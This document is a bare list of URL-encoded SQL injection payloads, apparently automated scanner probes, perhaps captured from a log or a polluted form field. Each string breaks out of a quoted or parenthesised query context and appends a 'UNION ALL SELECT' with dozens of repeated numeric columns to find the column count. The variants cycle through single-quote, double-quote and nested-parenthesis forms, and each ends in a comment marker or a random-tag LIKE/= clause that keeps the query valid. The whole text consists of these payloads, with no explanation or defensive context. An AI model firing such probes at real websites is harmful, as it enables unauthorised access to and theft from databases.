-2457%27%29%29%29%20UNION%20ALL%20SELECT%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%23%20AND%20%28%28%28%27GOaM%27%20LIKE%20%27GOaM -4158%27%29%29%29%20UNION%20ALL%20SELECT%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%23%20AND%20%28%28%28%27vaWl%27%20LIKE%20%27vaWl -6223%27%29%29%29%20UNION%20ALL%20SELECT%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%23%20AND%20%28%28%28%27xUPe%27%20LIKE%20%27xUPe -7945%27%29%29%29%20UNION%20ALL%20SELECT%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%2C%204917%23%20AND%20%28%28%28%27rEdy%27%20LIKE%20%27rEdy -6829%27%29%29%29%20UNION%20ALL%20SELECT%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%2C%206228%23%20AND%20%28%28%28%27SWxr%27%20LIKE%20%27SWxr -2868%27%29%29%29%20UNION%20ALL%20SELECT%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%23%20AND%20%28%28%28%27eMfC%27%20LIKE%20%27eMfC -8602%27%29%29%29%20UNION%20ALL%20SELECT%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%23%20AND%20%28%28%28%27HZen%27%20LIKE%20%27HZen -1977%27%29%29%29%20UNION%20ALL%20SELECT%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%23%20AND%20%28%28%28%27spuJ%27%20LIKE%20%27spuJ -4065%27%29%29%29%20UNION%20ALL%20SELECT%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%2C%204496%23%20AND%20%28%28%28%27rKpg%27%20LIKE%20%27rKpg -1382%27%20UNION%20ALL%20SELECT%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%23%20AND%20%27PfHf%27%20LIKE%20%27PfHf -4929%27%20UNION%20ALL%20SELECT%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%23%20AND%20%27NUhp%27%20LIKE%20%27NUhp -9970%27%20UNION%20ALL%20SELECT%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%2C%203671%23%20AND%20%27lnDY%27%20LIKE%20%27lnDY -4991%27%20UNION%20ALL%20SELECT%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%2C%209917%23%20AND%20%27uNZY%27%20LIKE%20%27uNZY -9644%27%20UNION%20ALL%20SELECT%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%23%20AND%20%27jalv%27%20LIKE%20%27jalv -3331%27%20UNION%20ALL%20SELECT%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%23%20AND%20%27knXn%27%20LIKE%20%27knXn -4622%27%20UNION%20ALL%20SELECT%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%23%20AND%20%27iaPR%27%20LIKE%20%27iaPR -7425%27%20UNION%20ALL%20SELECT%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%2C%203462%23%20AND%20%27TtLh%27%20LIKE%20%27TtLh -6345%27%20UNION%20ALL%20SELECT%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%23%20AND%20%27lcsI%27%20LIKE%20%27lcsI -3965%27%20UNION%20ALL%20SELECT%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%2C%205216%23%20AND%20%27AUGc%27%20LIKE%20%27AUGc -6977%22%29%20UNION%20ALL%20SELECT%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%23%20AND%20%28%22Stgh%22%3D%22Stgh -2014%22%29%20UNION%20ALL%20SELECT%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%2C%209202%23%20AND%20%28%22YQzI%22%3D%22YQzI -1278%22%29%20UNION%20ALL%20SELECT%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%2C%209570%23%20AND%20%28%22CnQF%22%3D%22CnQF -6507%22%29%20UNION%20ALL%20SELECT%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%2C%207966%23%20AND%20%28%22euoi%22%3D%22euoi -5944%22%29%20UNION%20ALL%20SELECT%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%2C%201056%23%20AND%20%28%22zyVn%22%3D%22zyVn -1382%22%29%20UNION%20ALL%20SELECT%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%23%20AND%20%28%22Zapr%22%3D%22Zapr -3139%22%29%20UNION%20ALL%20SELECT%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%2C%208232%23%20AND%20%28%22aPqf%22%3D%22aPqf -8617%22%29%20UNION%20ALL%20SELECT%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%23%20AND%20%28%22LsXD%22%3D%22LsXD -1986%22%29%20UNION%20ALL%20SELECT%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%23%20AND%20%28%22Zdxc%22%3D%22Zdxc -6492%22%29%20UNION%20ALL%20SELECT%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%23%20AND%20%28%22QNQK%22%3D%22QNQK -9933%22%29%29%20UNION%20ALL%20SELECT%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%23%20AND%20%28%28%22BJrh%22%3D%22BJrh -3098%22%29%29%20UNION%20ALL%20SELECT%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%23%20AND%20%28%28%22qYKE%22%3D%22qYKE -8915%22%29%29%20UNION%20ALL%20SELECT%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%2C%203246%23%20AND%20%28%28%22hgjr%22%3D%22hgjr -2558%22%29%29%20UNION%20ALL%20SELECT%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%23%20AND%20%28%28%22MEAd%22%3D%22MEAd -8367%22%29%29%20UNION%20ALL%20SELECT%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%2C%205339%23%20AND%20%28%28%22Kyej%22%3D%22Kyej -3246%22%29%29%20UNION%20ALL%20SELECT%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%2C%207924%23%20AND%20%28%28%22lsXU%22%3D%22lsXU -3111%22%29%29%20UNION%20ALL%20SELECT%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%2C%206318%23%20AND%20%28%28%22xMmI%22%3D%22xMmI -8310%22%29%29%20UNION%20ALL%20SELECT%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%23%20AND%20%28%28%22qOjE%22%3D%22qOjE -1294%22%29%29%20UNION%20ALL%20SELECT%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%23%20AND%20%28%28%22tmdb%22%3D%22tmdb -4478%22%29%29%20UNION%20ALL%20SELECT%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%23%20AND%20%28%28%22cHFg%22%3D%22cHFg -2304%22%29%29%29%20UNION%20ALL%20SELECT%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%2C%204629%23%20AND%20%28%28%28%22PvXc%22%3D%22PvXc -6063%22%29%29%29%20UNION%20ALL%20SELECT%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%2C%209575%23%20AND%20%28%28%28%22kRxy%22%3D%22kRxy -8757%22%29%29%29%20UNION%20ALL%20SELECT%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%2C%202454%23%20AND%20%28%28%28%22EomL%22%3D%22EomL -5464%22%29%29%29%20UNION%20ALL%20SELECT%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%2C%204436%23%20AND%20%28%28%28%22IDjt%22%3D%22IDjt -3458%22%29%29%29%20UNION%20ALL%20SELECT%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%23%20AND%20%28%28%28%22Oirb%22%3D%22Oirb -9081%22%29%29%29%20UNION%20ALL%20SELECT%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%23%20AND%20%28%28%28%22qCLB%22%3D%22qCLB -5387%22%29%29%29%20UNION%20ALL%20SELECT%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%2C%203994%23%20AND%20%28%28%28%22sbBo%22%3D%22sbBo 